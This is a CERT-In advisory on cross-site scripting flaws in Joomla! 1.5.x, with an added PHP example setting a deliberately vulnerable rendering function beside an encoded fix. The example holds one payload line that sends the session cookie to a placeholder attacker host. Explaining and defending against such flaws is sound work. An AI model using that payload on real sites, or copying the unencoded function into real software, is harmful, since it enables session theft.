Hash: SHA512
Cross-Site Scripting Vulnerabilities in Joomla!
http://www.cert-in.org.in/vulnerability/civn-2009-67.htm
Original Issue Date:June 09, 2009
Severity Rating: Medium
System Affected
* Joomla! 1.5.x prior to 1.5.11
Overview
Multiple cross-site scripting (XSS) vulnerabilities have been reported in
Joomla! core components. A remote attacker could exploit them to perform
cross-site scripting attacks against users of an affected site.
Description
Joomla! is a free, PHP-based dynamic portal engine and content management
system (CMS) used to create websites. It supports additional functionality
through third-party components and modules.
These vulnerabilities exist because the Admin, Content and Search
components of Joomla! do not properly sanitize some of the user-supplied
input before it is written into HTML output.
These issues are caused by input validation errors in the user view of
com_users in the administrator panel, in the JA_Purity template, and in the
frontend when displaying certain data. They could be exploited by attackers
to cause arbitrary script code to be executed in the user's browser in the
security context of an affected website.
An attacker could use these vulnerabilities to steal the victim's
cookie-based authentication credentials (the session cookie), which is
enough to take over the victim's session on the affected site.
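The defect class the advisory describes is output-side: a request parameter is written into a page without HTML encoding. The following is an added example, not Joomla! code and not taken from the advisory; the function names, the search-term parameter and the attacker payload are assumptions chosen for illustration. It shows the vulnerable rendering beside the encoded form, checks that the payload only survives in the vulnerable output, and sets the session cookie HttpOnly as a defence in depth against the cookie-theft impact named above.

```php
<?php
// Added example (not Joomla! code): a reflected XSS defect of the kind the
// advisory describes, beside the output-encoding fix. Function names, the
// "search term" parameter and the payload are assumptions for illustration.

// Defence in depth for the stated impact (cookie theft): an HttpOnly session
// cookie is not readable through document.cookie even if an XSS slips
// through. Must be set before session_start(); shown here for completeness.
ini_set('session.cookie_httponly', '1');

// Vulnerable: user-controlled input is interpolated into HTML unchanged.
function render_search_result_vulnerable(string $term): string
{
    return "<p>Search results for: <b>$term</b></p>";
}

// Fixed: encode for the HTML text context before interpolation.
// ENT_QUOTES also encodes single quotes, so the same function is safe inside
// a quoted attribute value; the explicit charset avoids encoding mismatches
// that could let a multibyte sequence smuggle a '<' past the encoder.
function render_search_result_safe(string $term): string
{
    $encoded = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Search results for: <b>$encoded</b></p>";
}

// Crude check used only by this demo: does the rendered HTML still contain
// the attacker-supplied markup verbatim?
function payload_survives(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

// Constructed payload: the classic cookie-exfiltration probe. The host is a
// placeholder, not a real collector.
$payload = '<script>document.location="http://attacker.example/c?"'
         . '+document.cookie</script>';

$bad  = render_search_result_vulnerable($payload);
$good = render_search_result_safe($payload);

echo "vulnerable output:\n$bad\n\n";
echo "encoded output:\n$good\n\n";

printf("payload survives in vulnerable output: %s\n",
       payload_survives($bad, $payload) ? 'yes' : 'no');
printf("payload survives in encoded output:    %s\n",
       payload_survives($good, $payload) ? 'yes' : 'no');
```

Run it with `php example.php`: the first report line prints `yes`, the second `no`, and the encoded output shows `&lt;script&gt;` rather than a live tag. The encoding must match the output context; htmlspecialchars() is correct for HTML text and quoted attributes, but it is not sufficient on its own for data placed inside a `<script>` block, a URL, or an unquoted attribute, which is why the advisory's three separate fixes (administrator view, template, frontend) each had to be made at the point where the data is emitted.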
Solution
Upgrade to Joomla! 1.5.11 or later
http://www.joomla.org/download.html
Vendor Information
Joomla
http://www.joomla.org
References
Joomla
http://developer.joomla.org/security/news/297-20090602-core-frontend-xss.html
http://developer.joomla.org/security/news/296-20090602-core-japurity-xss.html
http://developer.joomla.org/security/news/295-20090601-core-comusers-xss.html
ISS X-FORCE
http://xforce.iss.net/xforce/xfdb/50924
http://xforce.iss.net/xforce/xfdb/50923
http://xforce.iss.net/xforce/xfdb/50922
Secunia
http://secunia.com/advisories/35278/
OSVDB
http://osvdb.org/osvdb/show/54869
Disclaimer
The information provided herein is on "as is" basis, without warranty of
any kind.
Contact Information
Phone: +91-11-24368572
Postal address
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003
Note: Please do not reply to this e-mail. For further queries contact
CERT-In Information Desk. Email: info@cert-in.org.in
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.5 (Build 5050)
iQEVAwUBSi+wLHWXeYNsoT30AQpPygf8CKWcUkl4ZNgdERIMV5kg4p2D0FnDFObi
mzj+IGGl/cg3NLZGLWs7iWO3bMhsMdDX8Tw3y/gLStylZNuTotWJeAm3TBI6Yrzq
+niEc2+W68emeaRRwHJGTQCSFH7NnaWTCjSKo1ib6Hkwh49bnuKZtY+0i8Six2j9
zH/amdZ2frhwuIGxFvurfx3Dw9d30zBcdK+HhLCantsVLrqwi50y3CUf1d6VoT5q
ZXOqMYGBSsSPVpOBtTW4+2DdGrB2s2K7L77UyZFfNr8RVeA6QbtOQgCd5Jm96VBH
mLXsMD8DhJHyc3N/CfV+eSp1ySYDOfLk+zB+0UBGHSH7MnODCVDKWQ==
=1HpT
-----END PGP SIGNATURE-----
